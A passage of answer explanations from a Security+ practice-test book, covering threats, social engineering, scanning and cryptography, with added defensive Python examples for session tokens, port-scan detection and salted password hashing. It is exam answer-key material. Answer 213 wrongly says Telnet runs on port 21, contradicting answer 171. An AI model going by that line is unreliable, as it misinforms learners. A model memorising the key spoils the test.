156. C. An SSL stripping attack requires attackers to persuade a victim to send traffic through them via HTTP while continuing to send HTTPS encrypted traffic to the legitimate server by pretending to be the victim. This is not a brute-force attack, a Trojan attack would require malware, and a downgrade attack would try to move the encrypted session to a less secure encryption protocol.

157. C. The U.S. Trusted Foundry program is intended to prevent supply chain attacks by ensuring end-to-end supply chain security for important integrated circuits and electronics.

158. B. Threat maps like those found at threatmap.fortiguard.com and threatmap.checkpoint.com are visualizations of real-time or near real-time data gathered by vendors and other organizations that can help visualize major threats and aid in analysis of them. Pie charts may be done in real time via security information and event management (SIEM) or other systems, but note that no SIEM or other device was mentioned. A dark web tracker was made up for the question, and OSINT repositories wouldn’t show real-time data like this.

159. B. Bluesnarfing involves accessing data from a Bluetooth device when it is in range. Bluejacking involves sending unsolicited messages to Bluetooth devices when they are in range. Evil twin attacks use a rogue access point whose name is similar or identical to that of a legitimate access point. A RAT is a remote-access Trojan, and nothing in this scenario points to a RAT being the cause of the stolen data.

160. B. The rules of engagement for a penetration test typically include the type and scope of testing, client contact information and requirements for when the team should be notified, sensitive data handling requirements, and details of regular status meetings and reports.

161. C. This command starts a reverse shell connecting to example.com on port 8989 every hour. If you’re not familiar with cron, you should take a moment to read the basics of cron commands and what you can do with them—you can read a man page for cron at manpages.ubuntu.com/manpages/focal/man8/cron.8.html.

162. C. The penetration tester leveraged the principle of urgency and also used some elements of authority by claiming to be a senior member of the organization. They didn’t threaten or intimidate the help desk staff member and did not make something seem scarce, nor did they attempt to build trust with the staff member.

163. A. Proprietary, or closed threat, intelligence is threat intelligence that is not openly available. OSINT, or open source threat intelligence, is freely available. ELINT is a military term for electronic and signals intelligence. Corporate threat intelligence was made up for this question.

164. B. CompTIA defines “maneuver” in the context of threat hunting as how to think like a malicious user to help you identify potential indicators of compromise in your environment. Outside of the Security+ exam, this is not a commonly used term in normal security practice, although it does make an appearance in military usage. Since this term is not common outside of the Security+ exam, make sure you understand the CompTIA definition. Intelligence fusion adds multiple intelligence sources together, threat feeds are used to provide information about threats, and advisories and bulletins are often combined with threat feeds to understand new attacks, vulnerabilities, and other threat information.

165. B. Script kiddies are the least resourced of the common threat actors listed above. In general, they flow from national state actors as the most highly resourced, to organized crime, to hacktivists, to inside actors, and then to script kiddies as the least capable and least resourced actors. As with any scale like this, there is room for some variability between specific actors, but for the exam, you should track them in that order.

166. B. A SYN flood is a type of resource exhaustion attack and uses up all available sessions on the system it is aimed at. Although a SYN flood can be a DDoS, no mention was made of multiple source machines for the attack. No application was mentioned, and a SYN flood targets the TCP/IP stack on the system rather than an application. No vulnerability was mentioned, and none is required for a SYN flood, since it simply tries to overwhelm the target’s ability to handle the opened connections. Protections against SYN floods tend to focus on preventing opened connections from causing resource exhaustion and identifying and blocking abusive hosts.

167. A. Pretexting is a type of social engineering that involves using a false motive and lying to obtain information. Here, the penetration tester lied about their role and why they are calling (impersonation), and then built some trust with the user before asking for personal information. A watering hole attack leverages a website that the targeted users all use and places malware on it to achieve their purpose. Prepending is described by CompTIA as “adding an expression or a phrase,” and shoulder surfing involves looking over an individual’s shoulder or otherwise observing them entering sensitive information like passwords.

168. C. You may be familiar with the term war driving, but war flying is increasingly common as drones have entered wide use. Although penetration testers are somewhat unlikely to fly a helicopter or airplane over a target site, inexpensive drones can provide useful insight into both physical security and wireless network coverage if equipped with the right hardware. Droning and aerial snooping were made up for this question, and AirSnarf is an old tool for capturing usernames and passwords on vulnerable wireless networks.

169. C. Many organizations have legacy platforms in place that cannot be patched or upgraded but that are still an important part of their business. Security professionals are often asked to suggest ways to secure the systems while leaving them operational. Common options include moving the devices to an isolated virtual LAN (VLAN), disconnecting the devices from the network and ensuring they are not plugged back in, and using a firewall or other security device to ensure that the legacy system is protected from attacks and cannot browse the Internet or perform other actions that could result in compromise.

170. B. According to the national council of ISACs, information sharing and analysis centers, “Information Sharing and Analysis Centers (ISACs) help critical infrastructure owners and operators protect their facilities, personnel and customers from cyber and physical security threats and other hazards. ISACs collect, analyze and disseminate actionable threat information to their members and provide members with tools to mitigate risks and enhance resiliency.” IRTs are incident response teams, Feedburner is Google’s RSS feed management tool, and vertical threat feeds is not an industry term.

171. B. TCP port 23 is typically associated with Telnet, an unencrypted remote shell protocol. Since Telnet sends its authentication and other traffic in the clear (clear/plain text), it should not be used, and Lucca should identify this as a configuration issue involving an insecure protocol.

172. B. Privilege escalation attacks focus on gaining additional privileges. In this case, Cameron used physical access to the system to modify it, allowing him to then conduct a privilege escalation attack as an unprivileged user. A Trojan would have required a file to act like it was desirable, a denial-of-service attack would have prevented access to a system or service, and swap files (or page files) are drive space used to contain the contents of memory when memory runs low. Swap files may contain sensitive data, but the term swap file attack is not commonly used.

173. C. Common attributes of threat actors that you should be able to describe and explain for the Security+ exam include whether they are internal or external threats, their level of sophistication or capability, their resources or funding, and their intent or motivation. The number of years of experience is difficult to determine for many threat actors and is not a direct way to gauge their capabilities, and is therefore not a common attribute that is used to assess them.

174. B. Although engaging domain experts is often encouraged, requiring third-party review of proprietary algorithms is not. Many machine learning algorithms are sensitive since they are part of an organization’s competitive advantage. Ensuring that data is secure and of sufficient quality, ensuring a secure development environment, and requiring change control are all common artificial intelligence (AI)/machine learning (ML) security practices.

175. A. White teams act as judges and provide oversight of cybersecurity exercises and competitions. Options B and C may remind you of white- and gray-box tests, but they’re only there to confuse you. Cybersecurity teams are usually referred to with colors like red, blue, and purple as the most common colors, as well as the white teams that the Security+ exam outline mentions. Defenders in an exercise are part of the blue team.

176. C. Bug bounties are increasingly common and can be quite lucrative. Bug bounty websites match vulnerability researchers with organizations that are willing to pay for information about issues with their software or services. Ransoms are sometimes demanded by attackers, but this is not a ransom since it was voluntarily paid as part of a reward system. A zero-day disclosure happens when a vulnerability is disclosed and the organization has not been previously informed and allowed to fix the issue. Finally, you might feel like $10,000 is a payday, but the term is not used as a technical term and doesn’t appear on the exam.

177. A. Linux privileges can be set numerically, and 777 sets user, group, and world to all have read, write, and execute access to the entire /etc directory. Setting permissions like this is a common workaround when permissions aren’t working but can expose data or make binaries executable by users who should not have access to them. When you set permissions for a system, remember to set them according to the rule of least privilege: only the permissions that are required for the role or task should be configured.

178. B. Footprinting is the process of gathering information about a computer system or network, and it can involve both active and passive techniques. Mapping, fingerprinting, and aggregation are not the correct or common terms for this practice.

179. C. When dial-up modems were in heavy use, hackers would conduct war dialing exercises to call many phone numbers to find modems that would answer. When wireless networks became the norm, the same type of language was used, leading to terms like war walking, war driving, and even war flying. The rest of the options were made up, but you should remember that the Security+ exam expects you to know about war driving and war flying.

180. B. Lighting and utility systems, as well as SCADA, PLCs, CNC, scientific equipment and similar devices are types of operational technology. Since this is a distributed attack that results in a denial of service, it is a distributed denial-of-service (DDoS) attack. OT systems are often isolated or otherwise protected from remote network connections to prevent this type of attack since many OT devices do not have strong security controls or frequent updates. A SCADA overflow is not a term used in the industry, but network and application DDoS attacks do appear on the Security+ exam outline, and you will need to be able to differentiate them from this type of OT DDoS.

181. C. A false negative occurs with a vulnerability scanning system when a scan is run and an issue that exists is not identified. This can be because of a configuration option, a firewall, or other security setting or because the vulnerability scanner is otherwise unable to detect the issue. A missing vulnerability update might be a concern if the problem did not specifically state that the definitions are fully up-to-date. Unless the vulnerability is so new that there is no definition, a missing update shouldn’t be the issue. Silent patching refers to a patching technique that does not show messages to users that a patch is occurring. A false positive would have caused a vulnerability to show that was not actually there. This sometimes happens when a patch or fix is installed but the application does not change in a way that shows the change.

182. A. Refactoring a program by automated means can include adding additional text, comments, or nonfunctional operations to make the program have a different signature without changing its operations. This is typically not a manual operation due to the fact that antimalware tools can quickly find new versions. Instead, refactoring is done via a polymorphic or code mutation technique that changes the malware every time it is installed to help avoid signature-based systems.

183. B. Hybrid warfare is a relatively new term that describes the multipronged attacks conducted as part of a military or national strategy of political warfare that uses traditional, asymmetric, and cyber warfare techniques along with influence methods to achieve goals.

184. C. This is an example of a hoax. Hoaxes are fake security threats and can consume both time and resources to combat. User awareness and good habits for validating potential hoaxes are both useful ways to prevent them from consuming more time and energy than they should. A phishing attempt would target credentials or other information, no identity information is mentioned for identity fraud here, and an invoice scam involves a fake or modified invoice.

185. B. This is an attempt to get the server to send a request to itself as part of an API call, and it is an example of server-side request forgery. A cross-site scripting attack would use the victim’s browser rather than a server-side request, as would a CSRF attack.

186. B. Threat hunting can involve a variety of activities such as intelligence fusion, combining multiple data sources and threat feeds, and reviewing advisories and bulletins to remain aware of the threat environment for your organization or industry.

187. C. Passwords in memory are often stored in plain text for use. This means that attackers can recover them if they can access the memory where the password is stored, even if the storage is ephemeral.

188. D. The AIS service uses STIX and TAXII. STIX and TAXII are open standards that the Department of Homeland Security started the development of and uses for this type of effort. You can read more about AIS here: www.us-cert.gov/ais.

189. C. The reconnaissance phase of a penetration test involves gathering information about the target, including domain information, system information, and details about employees like phone numbers, names, and email addresses.

190. A. Angela has impersonated an actual employee of the delivery service to gain access to the company. Company uniforms are a very useful element for in-person social engineering. Whaling is a type of phishing attack aimed at leaders in an organization. A watering hole attack deploys malware or other attack tools at a site or sites that a target group frequently uses. Prepending is vaguely defined by the Security+ exam but can mean a number of things. When you see prepending on the exam, it should normally mean “adding something to the front of text.”

191. D. Acquisition via the gray market can lead to lack of vendor support, lack of warranty coverage, and the inability to validate where the devices came from. Nick should express concerns about the supply chain, and if his devices need to be from a trusted source or supplier with real support he may need to change his organization’s acquisition practices.

192. B. XML injection is often done by modifying HTTP queries sent to an XML-based web service. Reviewing web server logs to see what was sent and analyzing them for potential attacks will help Christina see if unexpected user input is visible in the logs. Syslog, authentication logs, and event logs are unlikely to contain information about web applications that would show evidence of an XML injection–based attack.

Use the following scenario for questions 193–195.

Frank is the primary IT staff member for a small company and has migrated his company’s infrastructure from an on-site data center to a cloud-based infrastructure as a service (IaaS) provider. Recently he has been receiving reports that his website is slow to respond and that it is inaccessible at times. Frank believes that attackers may be conducting a denial-of-service attack against his organization.

193. C. Frank’s best option is to review the anti-denial-of-service and other security tools that his cloud hosting provider provides, and to make appropriate use of them. The major infrastructure as a service (IaaS) providers have a variety of security tools that can help both detect and prevent DoS attacks from taking down sites that are hosted in their infrastructure. Calling the cloud service provider’s ISP will not work because the ISP works with the cloud provider, not with Frank! It is possible the cloud service provider might be able to assist Frank, but they are most likely to instruct him to use the existing tools that they already provide.

194. C. Since Frank is using the cloud service provider’s web services, he will need to review the logs that they capture. If he has not configured them, he will need to do so, and he will then need a service or capability to analyze them for the types of traffic he is concerned about. Syslog and Apache logs are both found on a traditional web host, and they would be appropriate if Frank was running his own web servers in the infrastructure as a service (IaaS) environment.

195. B. The most useful data is likely to come from an IPS, or intrusion prevention system. He will be able to determine if the attack is a denial-of-service (DoS) attack, and the IPS may be able to help him determine the source of the denial-of-service attack. A firewall might provide some useful information but would only show whether or not traffic was allowed and would not analyze the traffic for attack information. A vulnerability scanner would indicate if there was an issue with his application or the server, but it would not identify this type of attack. Antimalware software can help find malware on the system but isn’t effective against a DoS attack.

196. D. Contractual terms, auditing, and security reviews are all common means of reducing third-party risks when working with a vendor that is performing systems integration work. An SOC (service organization controls) report would typically be requested if you were going to use a third-party vendor’s data center or hosted services.

197. B. Training an artificial intelligence (AI) or machine learning (ML) system with tainted data is a significant concern. Elias needs to ensure that the traffic on his network is typical and nonmalicious to ensure that the AI does not presume that malicious traffic is normal for his network.

198. C. The most common motivation for hacktivists is to make a political statement. Reputational gains are often associated with script kiddies, whereas financial gain is most commonly a goal of organized crime or insider threats. Gathering high-value data is typical of both nation-state actors and organized crime.

199. D. Predictive analysis tools use large volumes of data, including information about security trends and threats, large security datasets from various security tools and other sources, and behavior patterns, to predict and identify malicious and suspicious behavior.

200. C. Identity fraud and identity theft commonly use Social Security numbers as part of the theft of identity. Tailgating involves following a person through a security door or gate so that you do not have to present credentials or a code, whereas impersonation is a social engineering technique where you claim to be someone else. Blackmail is a potential answer, but the most common usage is for identity fraud.

201. A. SOAR tools, like security information and event management (SIEM) tools, are highly focused on security operations. They include threat and vulnerability management, security incident response, and security operations and automation tools, but they do not provide source code analysis and testing tools.

202. B. The Security+ exam outline specifically lists these items as threat vectors. Although there are many others, you should be familiar with direct access, wireless, email, supply chain, social media, removable media, and cloud as vectors for the exam.

203. C. Although it may seem strange at first, both SourceForge and GitHub are used to house sample exploit code as well as other information that threat intelligence analysts may find useful. They are not part of the dark web, nor are they an automated indicator sharing (AIS) source or a public information sharing center.

204. B. Trusting rather than validating user input is the root cause of improper input handling. All input should be considered potentially malicious and thus treated as untrusted. Appropriate filtering, validation, and testing should be performed to ensure that only valid data input is accepted and processed.

205. C. The code is an example of a PowerShell script that downloads a file into memory. You can rule out the upload options by reading the script since it mentions a download in the script example. Since we see a string being downloaded, rather than a file and location, you may be able to guess that this is a fileless malware example.

206. C. Session IDs should be unique for distinct users and systems. A very basic type of session replay attack involves providing a victim with a session ID and then using that session ID once they have used the link and authenticated themselves. Protections such as session timeouts and encrypting session data, as well as encoding the source IP, hostname, or other identifying information in the session key, can all help prevent session replay attacks.
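An added example (not from the book) of two of the protections listed in question 206, a session timeout and binding the session key to the source IP, using Python’s standard hmac module: the server signs a random session ID together with the client address and an expiry, so a token presented from another address, after expiry, or after tampering fails verification. The server key, addresses and timestamps are constructed.

```python
"""Session tokens that expire and are bound to the client address.

Added example, not from the book. Question 206 lists session timeouts and
encoding the source IP or other identifying information in the session key as
defences against session replay. Here the server issues a random session ID and
signs it together with the client IP and an expiry time using a server-side
HMAC key, so a token cannot be reused from elsewhere or after it expires. The
key, addresses and times are constructed.
"""
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Constructed for the example; a real deployment loads this from a secret store
# and rotates it. Nothing in the token reveals it.
SERVER_KEY = b"example-server-hmac-key-constructed"
SESSION_LIFETIME = 900  # seconds of idle time before the token is useless


def _mac(session_id: str, client_ip: str, expires: int) -> str:
    """HMAC-SHA256 over everything the server wants to bind together."""
    msg = f"{session_id}|{client_ip}|{expires}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_token(client_ip: str, now: Optional[float] = None) -> str:
    """Create a token of the form <random id>.<expiry>.<mac>.

    The id comes from the server's CSPRNG, never from the client, which also
    closes the 'hand the victim a session ID first' variant described in the
    answer: an ID the attacker chose is simply never issued or accepted.
    """
    now = time.time() if now is None else now
    session_id = secrets.token_urlsafe(24)   # URL-safe, contains no '.'
    expires = int(now) + SESSION_LIFETIME
    return f"{session_id}.{expires}.{_mac(session_id, client_ip, expires)}"


def verify_token(token: str, client_ip: str, now: Optional[float] = None) -> Optional[str]:
    """Return the session id if the token is intact, unexpired and presented
    from the address it was issued to; otherwise None."""
    now = time.time() if now is None else now
    try:
        session_id, expires_str, mac = token.split(".")
        expires = int(expires_str)
    except ValueError:
        return None                       # malformed token
    if now > expires:
        return None                       # timed out
    expected = _mac(session_id, client_ip, expires)
    # compare_digest keeps the comparison time independent of where the
    # first differing byte is, so the MAC cannot be guessed byte by byte.
    if not hmac.compare_digest(mac, expected):
        return None                       # replayed from another IP, or tampered
    return session_id


if __name__ == "__main__":
    issued_at = 1_700_000_000
    token = issue_token("203.0.113.10", now=issued_at)
    print("same client, in time  :", verify_token(token, "203.0.113.10", now=issued_at + 60) is not None)
    print("different client      :", verify_token(token, "198.51.100.7", now=issued_at + 60) is not None)
    print("after lifetime expired:", verify_token(token, "203.0.113.10", now=issued_at + 901) is not None)
```

Binding to the source IP breaks legitimate sessions for clients behind carrier NAT or on mobile networks, so many deployments bind to a less volatile value (such as a TLS channel or device identifier) and keep the timeout.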

207. B. The Security+ exam outline lists seven major impact categories, including data loss, data breaches, and data exfiltration. Data modification is not listed, but it is a concern as part of the integrity leg of the CIA triad.

208. C. Academic journals are the slowest of the items listed because of the review processes involved with most reputable journals. Although academic journals can be useful resources, they are typically not up-to-the-minute sources. Other resources you should be aware of are vendor websites, conferences, social media, and RFCs (requests for comments).

209. C. Vulnerability scans and port scans can often be detected in logs by looking for a series of ports being connected to. In this case, the log was created by scanning a system with an OpenVAS scanner. There is no indication of a successful login or other hacking attempt, and a service startup would show in the messages log, not the auth log. A reboot would also show in the messages log rather than the auth log.
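An added example (not from the book) of the detection idea in question 209: a Python detector that reads syslog-style netfilter lines and flags any source that connects to a series of distinct ports within a short window. The log lines and addresses are constructed, and the sample also shows the caveat that a slow sweep stays under a fixed-window threshold.

```python
"""Flag likely port scans in syslog-style firewall log lines.

Added example, not from the book. Question 209 notes that vulnerability and
port scans show up in logs as one source connecting to a series of ports. This
detector groups iptables/UFW-style kernel log lines by source address and
reports any source that touches at least PORT_THRESHOLD distinct destination
ports within WINDOW_SECONDS. The log lines and addresses are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple

PORT_THRESHOLD = 5     # distinct ports from one source within the window
WINDOW_SECONDS = 60

# Matches the netfilter log format: "<syslog ts> <host> kernel: ... SRC=a.b.c.d ... DPT=n"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: .*?"
    r"SRC=(?P<src>[\d.]+) .*?DPT=(?P<dpt>\d+)"
)


def parse_line(line: str, year: int = 2021) -> Optional[Tuple[datetime, str, int]]:
    """Extract (timestamp, source ip, destination port); None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year, so the caller supplies one
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["src"], int(m["dpt"])


def detect_port_scans(lines: List[str]) -> Dict[str, List[int]]:
    """Return {source_ip: sorted distinct ports} for every source whose
    distinct-port count within some WINDOW_SECONDS span reaches PORT_THRESHOLD."""
    events: Dict[str, List[Tuple[datetime, int]]] = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, src, dpt = parsed
            events[src].append((ts, dpt))
    flagged: Dict[str, List[int]] = {}
    for src, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # advance the window start until the span fits WINDOW_SECONDS
            while (evs[end][0] - evs[start][0]).total_seconds() > WINDOW_SECONDS:
                start += 1
            if len({p for _, p in evs[start:end + 1]}) >= PORT_THRESHOLD:
                flagged[src] = sorted({p for _, p in evs})
                break
    return flagged


def _line(ts: str, src: str, spt: int, dpt: int) -> str:
    """Build one constructed UFW-style log line."""
    return (f"{ts} web01 kernel: [UFW BLOCK] IN=eth0 OUT= SRC={src} DST=10.0.0.5 "
            f"PROTO=TCP SPT={spt} DPT={dpt}")


# Constructed sample: a fast sweep, a normal client retrying one service,
# and a slow sweep spaced two minutes apart that a 60-second window misses.
SAMPLE_LOG = [
    _line("Mar 12 10:00:01", "198.51.100.23", 40122, 21),
    _line("Mar 12 10:00:01", "198.51.100.23", 40123, 22),
    _line("Mar 12 10:00:02", "198.51.100.23", 40124, 23),
    _line("Mar 12 10:00:02", "198.51.100.23", 40125, 25),
    _line("Mar 12 10:00:03", "198.51.100.23", 40126, 80),
    _line("Mar 12 10:00:03", "198.51.100.23", 40127, 443),
    _line("Mar 12 10:00:04", "198.51.100.23", 40128, 8080),
    _line("Mar 12 10:01:10", "203.0.113.8", 51000, 443),
    _line("Mar 12 10:01:11", "203.0.113.8", 51001, 443),
    _line("Mar 12 10:05:00", "192.0.2.77", 60000, 22),
    _line("Mar 12 10:07:00", "192.0.2.77", 60001, 80),
    _line("Mar 12 10:09:00", "192.0.2.77", 60002, 443),
    _line("Mar 12 10:11:00", "192.0.2.77", 60003, 3306),
    _line("Mar 12 10:13:00", "192.0.2.77", 60004, 3389),
    "Mar 12 10:13:30 web01 sshd[2041]: Accepted publickey for deploy from 10.0.0.9 port 50222 ssh2",
]

if __name__ == "__main__":
    for src, ports in detect_port_scans(SAMPLE_LOG).items():
        print(f"{src}: {len(ports)} distinct ports within {WINDOW_SECONDS}s -> {ports}")
```

The slow sweep from 192.0.2.77 is the weakness of any fixed window: lowering the threshold or lengthening the window catches it at the cost of more false positives, which is why production detectors usually combine this with longer-term per-source counts.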

210. C. Although it may be tempting to immediately upgrade, reading and understanding the CVEs for a vulnerability is a good best practice. Once Charles understands the issue, he can then remediate it based on the recommendations for that specific problem. Disabling PHP or the web server would break the service, and in this case, only newer versions of PHP than 5.4 have the patch Charles needs.

211. D. Although 80 and 443 are the most common HTTP ports, it is common practice to run additional web servers on port 8080 when a nonstandard port is needed. SSH would be expected to be on port 22, RDP on 3389, and MySQL on 3306.

212. B. Once this issue is remediated, Rick should investigate why the system was running a plug-in from 2007. In many cases, when you discover a vulnerable component like this it indicates a deeper issue that exists in the organization or processes for system and application maintenance. Installing a web application firewall (WAF) or reviewing intrusion prevention system (IPS) logs may be useful if Rick thinks there are ongoing attacks or that successful attacks have occurred, but the problem does not state anything about that. There is no indication of compromise, merely a completely outdated plug-in version in the problem. If you want a sample system with vulnerable plug-ins like this to test, you can download the 2015 release of the Open Web Application Security Project (OWASP) broken web applications virtual machine. It has a wide range of completely out-of-date applications and services to practice against.

213. C. A network device running SSH and a web server on TCP port 443 is a very typical discovery when running a vulnerability scan. Without any demonstrated issues, Carolyn should simply note that she saw those services. Telnet runs on port 21, an unencrypted web server will run on TCP 80 in most cases, and Windows file shares use a variety of ports including TCP ports 135–139 and 445.

214. B. Configuration reviews, either using automated tools or manual validation, can be a useful proactive way to ensure that unnecessary ports and services are not accessible. Configuration management tools can also help ensure that expected configurations are in place. Neither passive nor active network packet capture will show services that are not accessed, meaning that open ports could be missed, and log review won’t show all open ports either.

215. C. Errors are considered a vulnerability because they often provide additional details about the system or its configuration. They typically cannot be used to directly exploit or crash the system.

216. D. This appears to be a situation where your network’s DNS server is compromised and sending people to a fake site. A Trojan horse is malware tied to a legitimate program. IP spoofing would be using a fake IP address, but that is not described in this scenario. In fact, the users are not even typing in IP addresses—they are typing in URLs. Clickjacking involves tricking users into clicking something other than what they intended.

217. C. This is a classic example of typosquatting. The website is off by only one or two letters; the attacker hopes that users of the real website mistype the URL and are taken to their fake website. Session hijacking is taking over an authenticated session. Cross-site request forgery sends fake requests to a website that purport to be from a trusted, authenticated user. Clickjacking attempts to trick users into clicking on something other than what they intended.

Chapter 2: Architecture and Design

1. C. The diagram shows services and ports, but it does not list the protocol. Ben should ask if these are TCP- or UDP-based services, since an incorrect guess would result in a nonfunctional service, and opening up unnecessary protocols may inadvertently create exposures or risks. The subnet mask is shown where multiple systems in a network on the client side require it, the service name isn’t necessary for a firewall rule, and API keys should not be stored in documents like this.

2. A. The correct answer is the Open Web Application Security Project (OWASP). It is the de facto standard for web application security. The North American Electric Reliability Corporation (NERC) is concerned with electrical power plant security, Trusted Foundry is a term used to describe a secure supply chain for computer ICs, and ISA/IEC standards are for securing industrial automation and control systems (IACSs).

3. B. Vendor diversity gives two security benefits. The first is that there is no single point of failure should one vendor cease operations. The second benefit is that each vendor has a specific methodology and algorithms used for detecting malware. If you use the same vendor at all points where you need malware detection, any flaw or weakness in that vendor’s methodology will persist across the network. Using a single vendor means that any weakness in that vendor’s methodology or technology could impact the entire system or network. Vendor forking is not a term in the industry, and this is not a neutral act; vendor diversity improves security.

4. B. In this scenario, the best fit to Scott’s needs is a second network attached storage (NAS) device with a full copy of the primary NAS. In a failure scenario, the secondary NAS can simply take the place of the primary NAS while individual disks or even the whole NAS is replaced. Tape-based backups take longer to restore, regardless of whether they are full or incremental backups, although incremental backups can take more time in some cases since swapping tapes in order can add time to the restoration process. Finally, a cloud-based backup system would be useful if Scott was worried about a local disaster but would be slower than a local identical NAS, thus not meeting Scott’s primary requirement.

5. C. Restoration order can be very important in a complex environment due to system dependencies. Restoration order can also ensure that the proper security controls are in place before systems are online. A data center should be able to handle systems coming online without failing if its power systems are properly designed. A second outage due to failed systems would mean that Yasmine has not determined why the outage has occurred, making restoration potentially dangerous or problematic. Finally, fire suppression systems should only activate for an actual fire or when fire precursors like smoke are detected, not for increased heat load.

6. B. Air gapping refers to the server not being on a network. This means literally that there is “air” between the server and the network. This prevents malware from infecting the backup server. A separate VLAN or physical network segment can enhance security but is not as effective as air gapping. A honeynet is used to detect attacks against a network, but it doesn’t provide effective defense against malware in this scenario.

7. C. Windows picture passwords require you to click on specific locations on a picture. This is an example of a something-you-can-do factor. Geolocation or a network location are examples of somewhere you are, whereas something you exhibit is often a personality trait, and someone you know is exactly what it sounds like: someone who can identify you as an individual.

8. C. Hash functions convert variable-length inputs into fixed-length outputs while minimizing the chances of multiple inputs resulting in the same output (collisions). They also need to be fast to compute. Hashes should not be reversible; they are a one-way function!

9. B. The most common way to ensure that third-party secure destruction companies perform their tasks properly is to sign a contract with appropriate language and make sure that they certify the destruction of the materials they are asked to destroy. Manual on-site inspection by third parties is sometimes done as part of certification, but federal certification is not a common process. Requiring pictures of every destroyed document would create a new copy, thus making it a flawed process.

10. A. Using both server-side execution and validation requires more resources but prevents client-side tampering with the application and data. For Olivia’s described needs, server-side execution and validation is the best option.

11. D. An Arduino is a microcontroller well suited for custom development of embedded systems. They are small, inexpensive, and commonly available. Unlike a Raspberry Pi, they are not a small computer, reducing their overall risk of compromise. A custom field-programmable gate array (FPGA) will typically be more complex and expensive than an Arduino, whereas a repurposed desktop PC introduces all the potential issues that a PC can include such as a vulnerable operating system or software.

12. D. Digital signatures are created using the signer’s private key, allowing it to be validated using their public key.

13. C. Adding one bit to a key doubles the work required. The original effort would have 2^128 potential solutions, whereas the increased key length would require 2^129. In real life, key lengths aren’t increased by 1; instead, they are typically increased by factors of 2, such as 128 to 256, or 1024 to 2048.

14. C. Key stretching is used to improve weak keys. One way of implementing it is by repeatedly using a hash function or a block cipher, increasing the effort that an attacker would need to exert to attack the resulting hashed or encrypted data. The rest of the options were made up.

15. A. A salt is a value added to a string before it is hashed. The salt is stored so that it can be added to passwords when they are used in the future to compare to the hash. Since each salt is unique, this means that an attacker would need to generate a unique rainbow table for every salt to be able to attack the stored hashes effectively. For high-value passwords, this may be worthwhile, but for bulk lists of passwords, it is not a reasonable attack method.
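The key stretching in answer 14 and the per-password salt in answer 15 are usually applied together. The following is an added example (not from the book) that does both with PBKDF2-HMAC-SHA256 from the Python standard library; the iteration count, record layout, and sample passwords are assumptions chosen for illustration.

```python
import hashlib
import hmac
import os
from typing import Optional

# Assumption: work factor for illustration only. A real deployment picks the
# largest count that login latency allows, and raises it as hardware improves.
ITERATIONS = 200_000
SALT_BYTES = 16


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> dict:
    """Return a storable record: salt, iteration count, and the stretched hash.

    The salt is generated fresh per password (answer 15) and stored next to
    the hash so the same derivation can be repeated at login time. PBKDF2
    repeats an HMAC `iterations` times, which is the key stretching described
    in answer 14: each guess costs the attacker the same repeated work.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                  salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": derived.hex()}


def verify_password(password: str, record: dict) -> bool:
    """Recompute the hash with the stored salt and count, then compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(record["salt"]),
                                    record["iterations"])
    # compare_digest avoids leaking where the first differing byte is.
    return hmac.compare_digest(candidate.hex(), record["hash"])


def precomputed_table_reusable(record_a: dict, record_b: dict) -> bool:
    """True only if a table built for one record's salt would also cover the other.

    A rainbow table is keyed on the exact bytes that were hashed. With unique
    salts, two users who chose the same password still produce different
    stored hashes, so the attacker needs one table per salt.
    """
    return record_a["salt"] == record_b["salt"]


if __name__ == "__main__":
    # Constructed sample: two accounts that happen to share a password.
    alice = hash_password("correct horse battery staple")
    bob = hash_password("correct horse battery staple")
    print("login ok:", verify_password("correct horse battery staple", alice))
    print("same stored hash:", alice["hash"] == bob["hash"])
    print("one table covers both:", precomputed_table_reusable(alice, bob))
```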

16. C. Ian will use Michelle’s public key to encrypt the message so that only she can read it using her private key. If he wanted to sign the message, he could use his private key, and Michelle could use his public key to validate his signature. Neither Ian nor Michelle should ever reveal their private keys.

17. A. Elliptic curve cryptography (ECC) is faster because it can use a smaller key length to achieve levels of security similar to a longer RSA key (a 228-bit elliptic curve key is roughly equivalent to a 2,380-bit RSA key). Using the same key to encrypt and decrypt would be true for a symmetric encryption cryptosystem; however, neither of these is symmetric. Either algorithm can run on older processors given the right cryptographic libraries or programming, although both will be slower. Both can be used for digital signatures.

18. A. Perfect forward secrecy (PFS) is used to change keys used to encrypt and decrypt data, ensuring that even if a compromise occurs, only a very small amount of data will be exposed. Symmetric encryption uses a single key. Quantum key rotation and Diffie-Hellman key modulation are both terms made up for this question.

19. A. Checking a visitor’s ID against their logbook entry can ensure that the information they have recorded is correct and that the person’s ID matches who they claim to be. Biometric scans only work on enrolled individuals, meaning that many guests may not have biometric data enrolled. Two-person integrity control would only be useful if there was a concern that a guard was allowing unauthorized individuals into the facility. A security robot typically cannot validate a visitor’s identity from an ID and log entry. This may change as they become more advanced!

20. D. Honeypots are designed to attract a hacker by appearing to be security holes that are ripe and ready for exploitation. A honeynet is a network honeypot. This security technique is used to observe hackers in action while not exposing vital network resources. An intrusion detection system (IDS) is used to detect activity that could indicate an intrusion or attack. Neither active detection nor false subnet is a common industry term.

21. C. SCADA, or Supervisory Control and Data Acquisition systems, are commonly used to manage facilities like power plants. The rest of the options were made up.

22. D. Prime factorization algorithms and elliptic curve cryptography are believed to be vulnerable to future quantum computing–driven attacks against cryptographic systems. Although this is largely theoretical at the moment, quantum encryption may be the only reasonable response to quantum attacks against current cryptographic algorithms and systems.

